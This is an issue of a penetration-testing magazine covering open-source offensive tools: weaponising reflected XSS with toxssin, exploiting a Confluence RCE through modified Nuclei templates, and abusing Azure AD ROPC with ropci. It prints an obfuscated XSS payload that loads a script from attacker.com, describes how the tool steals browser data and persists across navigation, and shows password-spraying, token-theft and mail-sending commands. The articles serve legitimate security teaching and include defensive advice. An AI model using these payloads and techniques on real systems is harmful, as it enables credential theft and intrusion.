Pentesting Magazine - 2022-05 - Open-Source Pentesting Toolkit
www.hakin9.org

Editors:
Bartek Adach
[email protected]
Agata Staszelis
[email protected]
Bruno Zwierz
[email protected]

Proofreader:
Lee McKenzie

Senior Consultant/Publisher:
Paweł Marciniak

CEO:
Joanna Kretowicz
[email protected]

Marketing Director:
Joanna Kretowicz
[email protected]

DTP:
Bruno Zwierz
[email protected]

Cover Design:
Joanna Kretowicz

All trademarks, trade names, or logos mentioned or used are the property of their respective owners. The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
Dear PenTest Readers,
This open edition takes a special place in our hearts. Here, at PenTest Magazine, we deeply care about
the community and knowledge-sharing. The edition you are reading right now reflects that.
Inside this free issue you’ll find articles featuring open source tools for pentesters. Many of them are
written by the tools’ authors themselves - don’t forget to check their GitHub profiles afterwards! We wanted to
cover a broad spectrum of tools, ranging from useful scripts and Linux distributions to innovative tools.
Grab your favorite hot beverage (or something cold, we didn’t forget about you, Southern Hemisphere!),
find a comfortable position, and learn something new: pentesting Android devices, weaponizing
reflected XSS, scanning for vulnerabilities with Nuclei, getting to know ropci, and much more!
Please, don’t hesitate to contribute to the tools whenever you find room for improvement. Without a
doubt this is the most powerful part of the open source community - you truly can make a difference.
Contents
Weaponizing Reflected XSS
Panagiotis Chartas 4
ADB-Toolkit
Ashwini Sahu 32
@edoardottt's tools
Edoardo Ottavianelli 46
AthenaOS
Antonio Voza 52
Rekono
Pablo Santiago López 69
AutoPWN Suite
Kaan Gültekin 85
GooFuzz
David Utón Amaya 100
Weaponizing Reflected XSS
by Panagiotis Chartas
Introduction
Attacks based on social engineering were never really my thing. Don’t get me wrong, there’s nothing I
find more hilarious than a successful phishing campaign that results in multiple, juicy, trick-invoked,
shame bearing reverse shells. But, in the case of exploiting Reflected XSS (Cross-Site Scripting), which
is considered a lame, low-level vulnerability, I always thought it just wasn’t worth it, and here are the main
reasons why:
• The victim must be tricked into following a malicious URL (e.g., via a phishing campaign or a
personalized message),
• There are many exploitation obstacles. Browsers have built-in controls against it (analyzed later), not
to mention WAFs and security checks implemented by developers,
• It has an uncertain (usually short) lifespan (if the user navigates away from the vulnerable page or
closes the tab/browser, it’s game over),
• Even if none of the above stands in the way, you might not get anything juicy out of it.
Sounds like too much trouble for the level of uncertainty it bears as an attack vector.
Inspiration
Some time ago, I was testing a web application. After a few basic requests, source code inspection and
messing around with the login portal, I noticed that the “username” input’s value (normally a POST
request parameter) is susceptible to Cross-Site Scripting (XSS), as it is reflected, without any form of
sanitization, directly in the “username” input’s “value” attribute, by simply adding it to the URL as a GET
request parameter. Example:
https://victim.com/login.jsp?action=auth&username=yolo
The login page included one more low-criticality issue: it linked the outdated library jQuery 1.10.2,
which is subject to CVE-2015-9251 (among other vulnerabilities). I get very excited whenever I
detect outdated jQuery libraries because it means that, if XSS is present, it is most likely possible to
execute external JavaScript files using a very short payload. This is because jQuery, before version
3.0.0, will execute text/javascript responses when a cross-domain AJAX request is performed without
the “dataType” option set. For example, an AJAX request like $.ajax({url:'https://attacker.com/hook.js'})
will instantly execute the response’s body, making it easier to craft malicious URLs that include
external JS files and run sophisticated payloads in the victim’s browser, through social engineering
attacks.
I chose to utilize the “onmouseover” event to create a malicious URL payload that would request and
execute an external malicious JS script when the user would hover over the username field. It looked
something like this (URL decoded):
https://victim.com/login.jsp?action=auth&username="
onmouseover="$.ajax({url:'https://attacker.com/hook.js'})
To provide a better perspective, this is what the underlying source code would look like after visiting the
above malicious URL (simplified):
<!DOCTYPE html>
<html>
<body>
<form action="login.jsp" method="post">
<label for="username"><b>Username</b></label>
<input type="text" id="username" name="username" value="" onmouseover="$.ajax({url:'https://attacker.com/hook.js'})">
<label for="password"><b>Password</b></label>
<input type="password" id="password" name="password">
<button type="submit">Login</button>
</form>
</body>
</html>
Although valid, the URL payload resulted in a delayed error response (1+ minute latency) with the
message “Page temporarily not available”. Something (maybe a WAF?) was making exploitation a bit trickier. To
evade it, I transformed each character of the main payload to its equivalent ASCII char number
representation, used the String.fromCharCode() JavaScript function to translate the obfuscated
payload’s bytes into the original string and finally, executed the obfuscated payload-string using the
eval() function. Final payload looked like this (URL decoded):
https://victim.com/login.jsp?action=auth&username="
onmouseover="eval(String.fromCharCode(36, 46, 97, 106, 97, 120, 40, 123, 117,
114, 108, 58, 39, 104, 116, 116, 112, 115, 58, 47, 47, 97, 116, 116, 97, 99,
107, 101, 114, 46, 99, 111, 109, 47, 104, 111, 111, 107, 46, 106, 115, 39,
125, 41))
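The transformation is easy to reproduce. Below is a small Python helper (my own sketch, not part of toxssin or the original workflow) that converts a payload string into the comma-separated character codes used above and wraps them in the eval(String.fromCharCode(...)) construct:

```python
def obfuscate_js(payload: str) -> str:
    # Convert each character to its ASCII code and wrap the list in
    # eval(String.fromCharCode(...)), so the literal payload string
    # never appears in the URL.
    codes = ", ".join(str(ord(c)) for c in payload)
    return f"eval(String.fromCharCode({codes}))"

payload = "$.ajax({url:'https://attacker.com/hook.js'})"
print(obfuscate_js(payload))
```

Running it against the $.ajax payload produces exactly the code sequence shown in the URL above (36, 46, 97, ...).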
I started a Python HTTPS server on my attacker machine and gave it a run, everything was working as
expected. The only thing left now was to create and host the JavaScript payload.
Since the vulnerability existed in the login page, I could host a JS keylogger, forward the malicious URL
to some of the application’s users and hopefully harvest the credentials of anyone attempting to login
with a poisoned browser. As the document’s location would change after submitting the form, the
attack would probably end there. Classic, right? Well, I wasn’t satisfied.
I started fantasizing about capturing secrets sourced from the user’s activity, whether those are files,
typed text, application usage patterns, etc., kind of a spyware-like poison that could also survive
navigation to non-vulnerable locations.
Therefore (I said to myself), you need a JavaScript payload that will identify sensitive components in a
webpage and poison all of them instantly and dynamically, while maintaining persistence and reporting
back to a server (the attacker) on what the user is doing, e.g., where they are navigating, what they are
typing, pasting, uploading, viewing, submitting, and getting as a response. And toxssin was
born.
What is toxssin?
toxssin is a penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS)
vulnerabilities. It consists of an HTTPS server that works as an interpreter for the exfiltrated traffic and
notifications generated by the malicious JavaScript payload that powers the tool (toxin.js).
By default, toxssin’s JavaScript poison automatically spreads across the elements and information of a
webpage, abusing the XMLHttpRequest object to intercept:
• Paste events,
• File selections,
• Form submissions,
• Server responses (to form submissions or clicks on hyperlinks that target different pages rather than
internal parts of the same page),
• Table data (static, as well as updates to tables after a page has finished loading).
In addition, toxssin:
• Attempts to create XSS persistence while the user browses the website, by intercepting HTTP
requests and responses and re-writing the document, creating the illusion of navigation when the
document’s location actually never changes,
• Supports session management (you can use it to exploit multiple targets at the same time, e.g., by
running an XSS-based phishing campaign or exploiting stored XSS),
• Supports custom JS script execution against sessions (after a browser gets hooked, you can run
custom JS scripts against it).
Component: handler.js
Function: A handler script that serves as a wingman for the poison. It is called first to determine the
session type (new or existing) and inform the server accordingly. It then proceeds to retrieve and
deliver the poison.
Here’s a basic preview of a hooked browser, intercepted data, request and responses:
The output of intercepted requests is usually very long as it may include a combination of raw data
(text/binary), HTML, CSS and JavaScript, so, the default mode is to log each intercepted request’s data
in separate files as well as the main log that you see above, for each session.
How it works
Since there’s a video demonstration available online, I find it more interesting to describe how a few of
the best features this tool has to offer actually work.
Here’s how the Requests and Server Responses interception is implemented. I’ve placed a separate
icon for the user, his (poisoned) browser and the JavaScript poison (that is running in the browser) to
better visualize the process, although, all of these three entities are basically one:
The user submits a form or clicks a hyperlink. A request supposedly going to the legitimate webserver
is generated (Green arrow stopped by the red “X”).
Event listeners placed by toxssin’s poison prevent the normal request from completing
(event.preventDefault()). Instead, the request’s data are copied and the XMLHttpRequest object with the
withCredentials option set as true is used to forward a copy of the original request to the attacker’s
server as well as the legitimate server (orange arrows).
The intercepted server response is forwarded to the attacker’s server and then, the server’s response
body is modified so that the </body> closing tag string is replaced with the following:
<script src="https://attacker.com/handler.js"></script></body>
Finally, toxssin replaces the document object’s content with the modified server’s response body. All of
the elements included in the original response (media, scripts, etc.) start loading normally, creating the
illusion of actually browsing the webpage, when basically, the document’s location never changed. The
last element to load in the body is toxssin’s handler, a script that determines the type of session (new or
existing) and acts accordingly to inform the attacker’s server about the event and serve the poison
again, creating XSS persistence (blue arrows).
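The persistence trick boils down to a string replacement on the intercepted response body. A rough Python model of that rewrite (the real logic lives in toxssin's JavaScript poison; the handler URL is illustrative):

```python
HANDLER_TAG = '<script src="https://attacker.com/handler.js"></script>'

def poison_response(body: str) -> str:
    # Re-inject the handler just before </body>, so it is the last
    # element to load and can re-establish the XSS session.
    return body.replace("</body>", HANDLER_TAG + "</body>")

page = "<html><body><h1>Welcome</h1></body></html>"
print(poison_response(page))
```

Because the handler loads last, every other element of the legitimate response has already rendered, which is what sustains the illusion of normal browsing.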
A table is just like any other html element. In the case of XSS, any payload that spiders a webpage after
it has finished loading and sends a copy back to the attacker, will capture the data contained in tables
as well. But what if the user (victim) performs an action that causes the table data to update, e.g.,
clicks the next-page button, or uses a search or refresh function? It would be a shame to miss the juicy
data that may pop up, right? Don’t worry, fellow hackers, toxssin’s got your back.
I figured that the only thing I needed in order to implement a poison-function that will know when a
table’s data have been altered, recapture and forward them back to the attacker’s machine, is a hashing
algorithm (duh). Apparently, (vanilla) JavaScript doesn’t include hash algorithm implementations.
Searching around the web, I came across a 42 lines long, md5 hash algorithm JS implementation,
apparently written by Paul Johnston & Greg Holt, that worked like a charm. Armed with this code block,
I was able to write a function that calculates and marks every table in a web page with its md5
checksum and checks for changes every 1 second or so. When changes are detected, the new table
data is intercepted and forwarded back to the toxssin server (attacker) where it is processed and
logged.
Two alternative approaches I initially considered were:
• intercepting and forwarding the full page’s HTML source code back to the attacker,
• intercepting table elements only, sending their source code back to the attacker and calculating the
checksum server-side to determine if a table has changed.
An approach like that would cause a lot of heavy traffic generated by the victim’s browser. So, I decided
to go with the, in my opinion, more elegant (although a bit computationally heavy, one might say)
approach of adding an attribute “_digest” with the md5 checksum as value to each table, making it
possible to determine when a table’s content has been altered and recapture it.
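The same digest idea can be modeled in a few lines of Python (hashlib stands in here for the embedded JS md5 implementation; the table names and contents are illustrative):

```python
import hashlib

def md5_digest(table_html: str) -> str:
    # Fingerprint a table's markup, like toxssin's "_digest" attribute.
    return hashlib.md5(table_html.encode()).hexdigest()

# Mark every table with its digest once the page has loaded.
tables = {"orders": "<tr><td>old</td></tr>"}
digests = {name: md5_digest(html) for name, html in tables.items()}

# Later (e.g., after the user clicks "next page") re-check the digests;
# any mismatch means the table changed and should be re-captured.
tables["orders"] = "<tr><td>new</td></tr>"
changed = [n for n, h in tables.items() if md5_digest(h) != digests[n]]
print(changed)
```

In toxssin this check runs on a timer (every second or so), and only the changed tables are forwarded, which keeps the exfiltration traffic small.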
Obstacles
Here are, in my experience, the major obstacles of exploiting XSS by including external JS scripts and
how toxssin is dealing with them:
The "Mixed Content" error occurs when both HTTP and HTTPS assets are loaded by a web page that
was fetched over HTTPS. It can be resolved by serving the malicious JavaScript payload via HTTPS,
even with a self-signed certificate, although that is unreliable, as it leads to major obstacle #2 below.
A Content-Security-Policy header with the script-src set to specific domain(s) will block scripts
with cross-domain source from loading, making it (in my opinion) the greatest control against this type
of attack. In addition to that, toxssin relies on the eval() JS function to deliver its poison, so, if the
website has a CSP and the unsafe-eval source expression is not specified in the script-src directive, the
attack will most likely fail.
Epilogue
These, I believe, are the most interesting components of toxssin’s JS poison and general capabilities.
Wrapping up, it is worth mentioning that, although this article focuses on how a reflected XSS can be
turned into a serious attack vector, you can use this tool to exploit stored XSS as well.
An even more dangerous scenario: If an attacker obtains a low privilege shell (e.g., as www-data) on a
web server and is able to append (or escalate enough to append) code to the server’s web pages, it
would be possible to include a script with src being toxssin’s handler (linked internally or externally) and
proceed to harvest poisoned browser sessions indefinitely, spying on and intercepting people’s data
and actions.
Long story short… Developers and System Administrators, for the love of God, add a Content Security
Policy to your Web Server!!!
Nuclei Vulnerability Scanning in 2022... Or even
Vulnerability scanning is one of the most vilified and one of the most deified activities in the world of
security testing (call it whatever you want: pentest, ethical hacking, vulnerability scanning, BUT not red
teaming! Please, don't!).
There are many reasons for this, but let's mention just two that are a consequence of each other. Since
a lot of "pentests" are sold that are just automated vulnerability scanning and the results are presented
just as the scanning tools report them, there is a tendency to underestimate and even minimize its value
in security testing.
The truth is that it is not only valuable for the organizations themselves to continuously and constantly
perform vulnerability scans to know how their technology security is doing, it is also required by
standards such as PCI DSS and is mandatory/inevitable during a pentest.
There are a large number of vulnerability scanners at infrastructure and application level with different
ways of doing it and integrating with other tools, and they are even sold as SaaS. Prices and licensing
models vary and, despite this being somewhat "commercial", the fact is that no matter how good the
tool is, if the price/licensing is expensive/complex/prohibitive, we have to look for other options that do
not make "cheap is expensive" a real situation.
If we leave aside the commercial issue (of course, we have all the budget in the universe, price/
licensing is irrelevant!), anyone who has been using vulnerability scanners for a while looks eagerly for
ways to expand or customize the plugins/scripts that are the ones that actually detect and hopefully
confirm and get evidence of the vulnerability.
It’s not a secret that Nessus is the most used scanner, and it’s almost certain that at some point you
have wanted to execute just a NASL script from the command line in order to confirm a vulnerability with
some modification, or to turn the detection script into a full exploit.
However, many of these plugins have been in a binary format for several years now, and this makes it
impossible to take advantage of them properly.
This is when you might start to look at other options and OpenVAS arises, which is complicated in
every sense; it is not so "free" now and, on top of that, it is not very accurate in its results.
What's the point of all that long introduction? To define what a pentester looks for in a vulnerability
scanner and why Nuclei is one of the best options to follow:
• It must not add another new scripting language to my notes (those who say they know several
languages without looking at the notes or googling are lying).
Nuclei is a tool developed in Go for template-based scanning, with templates written in YAML (actually,
it is a DSL built on YAML. What is a DSL? Does SQL sound familiar to you? It is a well-known example
of a DSL). It is a project that the company ProjectDiscovery started as part of its initiative to build
automated tools that help with attack surface management (other projects they started include
subfinder, httpx, etc.).
Nuclei is used to send messages (requests for HTTP and frames for other types of services) using
templates that allow it to process the responses and find matches based on various conditions. In this
way, it minimizes false positives and provides a way to quickly scan multiple test targets (the latter is
stated in its repo and I can confirm that).
As you can see from the previous paragraph, the power of Nuclei is in the templates and that is where
the flexibility to correct/enhance/improve, customize and exploit lies.
It is important to point out, at this point, that at the beginning it was a scanner recommended to find the
classic "low hanging fruits". From that time to the present, a lot has happened.
For the details of installation, use and basic manipulation of templates, the site https://
nuclei.projectdiscovery.io/ has very good help, but entering the template repo helps a lot when you
need to do something from intermediate to advanced.
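To give a feel for the format, here is a minimal template sketch (the id, name, path, and matcher string are illustrative placeholders I made up; the exact schema is in the official template guide mentioned above):

```yaml
id: example-banner-detect

info:
  name: Example Server Banner Detection
  author: pentest-mag
  severity: info

requests:
  - method: GET
    path:
      - "{{BaseURL}}/version"
    matchers:
      - type: word
        part: body
        words:
          - "ExampleServer/1.0"
```

The request section describes what to send, and the matchers decide when the target counts as vulnerable (or, here, merely identified), which is how Nuclei keeps false positives down.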
As can be seen in the image below, an online report is presented that can be saved and indicates the
risk level of identified vulnerabilities. You can also save a log of each interaction performed to check
each vulnerability it reports.
Beyond the detection of vulnerabilities using existing templates, there are situations where the
pentester detects and confirms a vulnerability based on a banner and googling. This is perfect for
analyzing the possibility of automating the next vulnerability scan without having to go through the
manual process again. It is also interesting to see what can be contributed to the project by proposing
corrections and improvements to existing templates.
Even in the extreme, Nuclei allows changes that help to exploit the detected vulnerabilities. A practical
case is when Nuclei detects a vulnerability and the review of the details leads us to see that it can be
exploited, but we do not have the means (a script that automates, an exploit, a "one-liner", etc.) and we
look for a simple way to exploit it: Nuclei to the rescue!
To add something more, we know that sometimes the result of, for example, an HTTP request cannot
be observed with the attack data itself (in-band) and the results can be obtained out-of-band (OOB) by
means of certain interactions. Burp Professional has the Collaborator, but there is another open source
solution called "interact.sh" that is integrated with Nuclei as a free service.
Let's take as an example the template that checks for CVE-2021-26084, an RCE vulnerability in
Confluence. Nuclei already has a template for it that only sends a request with a specific encoded
string and checks that it appears in the response along with the result of an arithmetic operation
(wasn't it RCE?), without making use of interact.sh. A first approach to getting a different result is to
perform the external interaction (which also serves to check how much control there is over outgoing
connections).
The image below shows the modified version. It is quite simple: only the execution of a command
(curl) is performed using the interact.sh marker, and the template checks whether an HTTP interaction
was obtained in response (other matching conditions can be tested).
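The relevant fragment of such a modification looks roughly like this (the path and request body are abbreviated, since the full encoded OGNL payload is long; interactsh_protocol is the field Nuclei exposes for out-of-band matching):

```yaml
requests:
  - method: POST
    path:
      - "{{BaseURL}}/pages/createpage-entervariables.action"
    # The injected command calls back to the interact.sh marker;
    # the encoded payload around it is abbreviated here.
    body: "queryString=...curl {{interactsh-url}}..."
    matchers:
      - type: word
        part: interactsh_protocol  # becomes "http"/"dns" when the callback fires
        words:
          - "http"
```

If the curl callback reaches interact.sh, the matcher fires, proving both code execution and outbound connectivity.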
That's the basic, blind form of RCE confirmation: you can't extract information; you only check that
commands execute, without seeing their results.
To have a better result, you must deploy your own server (attacker) and modify the tool (the template
specifically) to do more than the basics.
The benefits of making this small effort are concrete evidence, preparation for chaining with other
steps (vulnerability chains), and integration into DevSecOps environments.
Then, we run a web server that supports a form of upload (enabling the PUT method may be the
easiest) as shown in the image below.
Then we modify the template in such a way that we put a "payload" in the sequence of commands that
we want to execute. For each one of them, a file will be generated and then uploaded to our server.
Each of these files will have the result of the execution of each command.
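A throwaway upload endpoint for those result files can be a few lines of Python. This is a minimal sketch assuming PUT uploads are written to the current directory; harden it (auth, TLS, size limits) before any real engagement:

```python
import os
from http.server import BaseHTTPRequestHandler, HTTPServer

class PutHandler(BaseHTTPRequestHandler):
    """Accepts PUT uploads and writes them to the working directory."""

    def do_PUT(self):
        name = os.path.basename(self.path) or "upload.bin"  # strip traversal
        length = int(self.headers.get("Content-Length", 0))
        with open(name, "wb") as f:
            f.write(self.rfile.read(length))
        self.send_response(201)
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the console quiet

def serve(port: int = 8000) -> HTTPServer:
    return HTTPServer(("0.0.0.0", port), PutHandler)

# serve(8000).serve_forever()  # uncomment to run
```

The victim-side command sequence then only needs something like curl -T result.txt http://attacker:8000/ for each generated file.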
That way, we went from having a vulnerability scanner report to exploiting one of the vulnerabilities it
detected without writing the code itself, just making use of YAML.
There is much more to Nuclei, because it also supports headless browser automation, workflows,
preprocessing and more.
ropci
So, you think you have MFA?
by Johann Rehberger
This article discusses ropci, which is a tool that aids with identifying and abusing OAuth2 ROPC
exposed applications in Microsoft AAD. In particular, the article explores what ROPC is, how to test for
it, how to abuse ROPC enabled applications during security assessments and pen tests, as well as
mitigation steps.
The author has helped identify multiple production AAD tenants, where AAD customers believed they
had MFA enabled, but ROPC based authentication succeeded. The root causes stem from convoluted,
but not uncommon, setups and misconfigurations, including scenarios such as federated auth, pass
through authentication, native AAD accounts vs on-prem accounts, as well as the various (at times
confusing) options in the user interface to configure MFA settings depending on the SKU used.
What is ROPC?
Resource Owner Password Credentials (ROPC) is an OAuth2 “flow” defined in RFC 6749. This auth
flow leverages old school username and password to retrieve an access token from a token server.
This means that the client application must process the user’s credentials, which is something that
OAuth2 was kind of invented to prevent. The main reason it seems to exist according to the RFC is to
support a migration from legacy applications to OAuth2.
OAuth 2.0 Security Best Current Practice highlights that “The resource owner password credentials
grant MUST NOT be used”, and Microsoft’s documentation likewise discourages its use.
So, the take-away seems to be that no one should be using ROPC anymore these days.
However, ROPC is enabled for many OAuth2 applications by default in Azure Active Directory.
If you have an AAD tenant, you have ROPC exposure and should test for it to make sure there are
no misconfigurations or insecure defaults that are being configured when it comes to MFA.
One thing to be aware of is that AAD contains the “CA003: Block legacy authentication” Conditional
Access Policy template, but that will not block ROPC.
In addition to the default Microsoft ROPC apps, customers frequently add custom applications (so
called Enterprise App Registrations) to their tenant that might have ROPC enabled.
If an adversary can exploit ROPC due to MFA not being explicitly enforced on an account, it can be
used to gain access to information in your AAD tenant, including:
• Enumerate all other OAuth apps (called Service Principals in AAD terminology)
• Other APIs including, but not limited to, Microsoft Graph API
There has been an uptick in tooling and attacks in this space, so it’s important to test for ROPC issues.
ROPC usage is pretty straightforward to spot or test for. The OAuth POST request to the token
endpoint will contain grant_type=password, which indicates the Resource Owner Password
Credentials flow.
Host: login.microsoftonline.com
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
grant_type=password&username=alice@{tenant}.com&password=ThisIsFine
&client_id=5d661950-3475-41cd-a2c3-
d671a3162bc1&scope=openid%20offline_access
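You can reproduce this request with a few lines of stdlib Python. The tenant, account and password below are placeholders; the client_id is the one from the request above:

```python
import urllib.parse, urllib.request

def ropc_request(tenant, username, password, client_id):
    """Build the ROPC token request for the AAD v2 token endpoint."""
    body = urllib.parse.urlencode({
        "grant_type": "password",        # the ROPC marker
        "username": username,
        "password": password,
        "client_id": client_id,
        "scope": "openid offline_access",
    }).encode()
    url = f"https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"
    return urllib.request.Request(url, data=body, method="POST")

req = ropc_request("contoso.com", "[email protected]", "ThisIsFine",
                   "5d661950-3475-41cd-a2c3-d671a3162bc1")
# urllib.request.urlopen(req) would perform the actual request;
# only run it against tenants you are authorized to test.
```

On success, the JSON response carries the access, refresh and id tokens shown below.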
If ROPC is enabled for the application (with the given client_id), and the tenant doesn’t block single-
factor authentication (SFA) for the account explicitly, e.g. via Conditional Access Policies that enforce
MFA, this POST request will return an access token, refresh token and also an id token as seen
below:
HTTP/1.1 200 OK
Content-Length: 4307

{
"token_type":"Bearer",
"access_token":"eyJ0e....SOEwM5DrmOVOl0k5AMAKjcohxkenT-fTYTP7NjViiOg",
"refresh_token":"0.AVAAtjkjOuyd6U-HMgmzuyXiBFAZZl…",
"id_token":"eyJ0eXAiOiJKV1QiLCJhbGciOi…",
"scope":"email openid profile AuditLog.Create Chat.Read
DataLossPreventionPolicy.Evaluate Directory.Read.All EduRoster.ReadBasic
Files.ReadWrite.All Group.ReadWrite.All InformationProtectionPolicy.Read
OnlineMeetings.Read People.Read SensitiveInfoType.Detect
SensitiveInfoType.Read.All SensitivityLabel.Evaluate User.Invite.All
User.Read User.ReadBasic.All",
"expires_in":4268,
"ext_expires_in":4268
}
Using these tokens, an adversary can start calling other Microsoft APIs.
The Azure Sign-In logs also show when ROPC logins occur; the authentication type to look for is
“ROPC”.
From an offensive security perspective there are a couple of test scenarios that are important to
evaluate. One tool that can be used to test and exploit ROPC issues is ropci.
Introducing ropci
To aid with testing for ROPC, you can download ropci from Github at: https://github.com/
wunderwuzzi23/ropci.
Ropci is written in Golang, and can be compiled to Windows, Linux and macOS. The Github repository
contains source code, as well as pre-compiled binaries for download.
Every command has help support to see what options are supported. But to get started with testing,
let’s see if we can authenticate.
To perform a basic and quick test, which you should do to see if your company has some bigger AAD
MFA misconfiguration, run the auth logon command, replacing the info in brackets with your own
testing information, as in this screenshot:
The above screenshot shows the most basic auth test. If authentication succeeds, the retrieved scopes
will be shown. If it fails, you will see the detailed AAD error message.
You can also provide a different client_id on the command line if you want other scopes.
IMPORTANT
If you get an access token this way, it is enough evidence to reach out to your IT department to
discuss ROPC! Things will only get worse from here on... The AAD tenant is not as secure as it
could or should be, as single-factor authentication via ROPC is possible.
Configuration
Besides a quick ad-hoc test, you can configure ropci to not have to enter information each time. The
default configuration is stored in the file .ropci.yaml; it contains basic information such as tenant,
username, password, client_id to use.
To create a config file, you can just type: ./ropci configure and enter the information you want to use:
Feel free to review the newly created .ropci.yaml file to see the configuration details.
Authenticating
Now you can attempt to logon using ROPC via ./ropci auth logon:
If authentication is successful, the access token, refresh token and id token, as well as granted scopes
will be written to the file .token.
Below is an example of ropci’s .token file, and you can see the scopes that were granted that way:
In some cases that we will show later, ropci will automatically switch the client_id under the hood and
re-authenticate to get the needed scopes for an operation (e.g., when sending mail with ./ropci mail send).
There are different kinds of applications in AAD, and we don’t have time to discuss them in detail, but
it’s typical that an app has delegated permission, which means the account whose username/password
was provided still needs to have the proper access rights as well. Meaning, you can’t read someone
else’s mailbox, unless the account used has the permission to read mail from other users, but the
account can read its own email.
Other authentication options - devicecode
Even though we are focused on ROPC authentication, you can also leverage devicecode
authentication to retrieve an access token. This is useful if you’d like to use ropci for its other features.
To get an access token via the devicecode flow run: $ ./ropci auth devicecode and follow instructions.
Refreshing tokens
If you have a refresh token cached in the .token file, just type ./ropci auth refresh to refresh it. Ropci
will do that automatically under the covers if the token is about to expire. You can also leverage tokens
from other tools this way (more in the help with ropci auth refresh help).
Invalidating tokens
You can also invalidate the token by simply typing ./ropci auth invalidate.
Using ropci
For this tutorial, let’s first explore the apps command, which allows you to list all OAuth applications in
use by the tenant (Microsoft calls these service principals, by the way, and the OAuth client_id is called
appId).
You can enumerate them with ./ropci apps list:
By default, only 100 entries are listed; if there are more, you can provide --all to see them all.
There is also a --format json option to dump all the information to JSON, which we will do to perform a
bulk assessment against all client_ids to see if we can get tokens via ROPC.
To parse the JSON output we get with the above command, I like using jq, for instance:
$ jq -r '.value[].appId' apps.list | wc -l
Quite a lot. Let’s do a bulk test for ROPC auth to see which ones are configured for ROPC and what
scopes/permissions we get!
Use the following one liner to query the tenant and get a csv file that can be used with the ./ropci auth
bulk command:
$ ./ropci apps list --all --format json | jq -r '.value[] |
[.displayName,.appId] | @csv' > apps.csv
This will create a csv file that can be used with the `auth bulk` command.
Additionally, there are clientids that are available in all tenants, but are not listed.
These are applications AAD makes available to everyone. I aggregated them from various sources
(such as AADInternals and other tools) and performed a bulk auth check with ropci. That way, I found
59 applications that support ROPC and will be present in pretty much every AAD tenant.
Here is a screenshot of the list showing the scopes for these “built-in” apps:
To repro this, you can use the “clientids” file in the ropci Github project (at https://github.com/
wunderwuzzi23/ropci/blob/v0.1/clientids) and perform a bulk authentication for all of them.
Another interesting feature of ropci is the ability to perform a password spray across accounts and
configure timeouts for the test.
Ropci will go over each password in the passwords file and try it for every user in the users file.
With --wait and --wait-try, the spray can be configured to pause after each password round, or
after each individual attempt. This allows you to run low-and-slow sprays to test detections.
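The iteration order described above (each password tried against every user, with optional pauses) can be sketched as a dry-run shell loop; the file contents are illustrative, and the commented `sleep` calls stand in for ropci's --wait/--wait-try throttling:

```shell
# Simulate ropci's spray order: outer loop over passwords, inner loop over
# users. The echo stands in for the actual ROPC auth attempt.
printf 'Winter2022!\nSpring2022!\n' > passwords.txt
printf 'alice@contoso.com\nbob@contoso.com\n' > users.txt
while read -r pass; do
  while read -r user; do
    echo "try $user : $pass"
    # sleep 5      # --wait-try equivalent: pause between individual attempts
  done < users.txt
  # sleep 600      # --wait equivalent: pause between password rounds
done < passwords.txt
```

Long pauses between rounds make the spray less likely to trip lockout thresholds and detections, which is exactly what the wait options exist for.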
IMPORTANT: Password spraying can lead to account lockouts. Hence, make sure that for any kind of
password brute force or spray, you have proper permission from the right stakeholders and that
potential implications/policies are understood upfront. Always understand what you are doing.
The users and groups commands can retrieve information about the current user and group memberships.
This is done with the following command:
$ ./ropci users who
It will list information about the current user, including ownership and membership of groups and roles.
You can also provide the -u argument to explore details of a specific other user account:
To dump all account information at scale, use the list method; to get the results in JSON format, use:
Searching
To explore users or groups more interactively, you can use the search option -s:
There are many other features, for instance, listing members and owners of groups, adding/removing
users/groups, or setting a user's password. Feel free to explore the users and groups methods further.
Another important feature is the ability to read and send email via ROPC. This can be done
with ./ropci mail list and ./ropci mail send.
If you want to see more content or preview of the emails, you can leverage --all --format json to dump
the details.
Sending emails
Sending emails requires a different client_id, which ropci will request automatically. Ropci uses the
client_id 57336123-6e14-4acc-8dcf-287b6088aa28, the Microsoft Whiteboard Client; it turns out it has
the Mail.Send permission.
Sending an email requires a template, which contains the content, recipients, attachments, etc., of the
email to be sent. Here is an example template file:
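The original screenshot of the template is not reproduced here. As a rough sketch, a template for sending mail this way would have to map onto the Microsoft Graph sendMail request body, which looks like the following; the recipient and content are placeholders, and ropci's actual template keys may differ:

```json
{
  "message": {
    "subject": "Quarterly report",
    "body": {
      "contentType": "Text",
      "content": "Please review the attached report."
    },
    "toRecipients": [
      { "emailAddress": { "address": "[email protected]" } }
    ]
  },
  "saveToSentItems": "false"
}
```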
And this is how it looks in action:
Please note how ropci requested a new access token and stored it in .token-mailsend. This is the
token for the Microsoft Whiteboard Client app, and it can send mail as the user.
A cool feature is searching through an account's email via ./ropci search, which lets you quickly look
through the user's mailbox. The following is an example:
As you can see, the search found some emails that contain the search keyword!
There is a lot more!
Each ropci command has a wide list of sub-commands, and there are also azure and drive commands
that you can explore.
With drive, it’s possible to list, download and upload files to SharePoint, for instance!
If you are interested in exploring other Graph API methods, you can use the call method, which lets you
construct your own Graph API requests for methods not yet implemented in ropci.
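As a sketch, a hand-rolled Graph request with an already-obtained access token could look like the following; the `.token` file name and the curl invocation are assumptions for illustration, not ropci's documented behavior, and the command is echoed rather than executed since it needs a live token:

```shell
# Dry-run: print the raw Graph API call one would issue with a bearer token.
# /v1.0/me is the standard "current user" endpoint of the public Graph API.
echo 'curl -s -H "Authorization: Bearer $(cat .token)" https://graph.microsoft.com/v1.0/me'
```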
With the following command, you can see available method names:
Another feature, with basic functionality, is the azure module. If MFA is not enforced, one might be able
to read Azure subscriptions, and VMs the user has access to using ./ropci azure:
In case the account has proper privileges, it’s possible to directly send a command to a VM. To try that,
use the ./ropci azure vm-runcmd feature. Pretty neat!
Let’s summarize the most important tests you should try as a pen tester. From experience, the following
test cases seem important to validate that an AAD tenant is securely configured.
Test your own tenant for these attacks to make sure an adversary can't exploit them:
• The following three scenarios are often fruitful to identify MFA misconfigurations:
• AAD accounts – Native AAD accounts might be an afterthought (in case of federation/SSO, etc.)
• $ ./ropci auth bulk: test all apps, and review the results and granted scopes.
Afterwards, check whether any unexpected applications have ROPC exposed and try to
lock them down accordingly.
• Always explicitly enforce MFA! This sounds easy, but it is apparently challenging to
implement, given the number and kinds of bypasses I have seen in production AAD tenants.
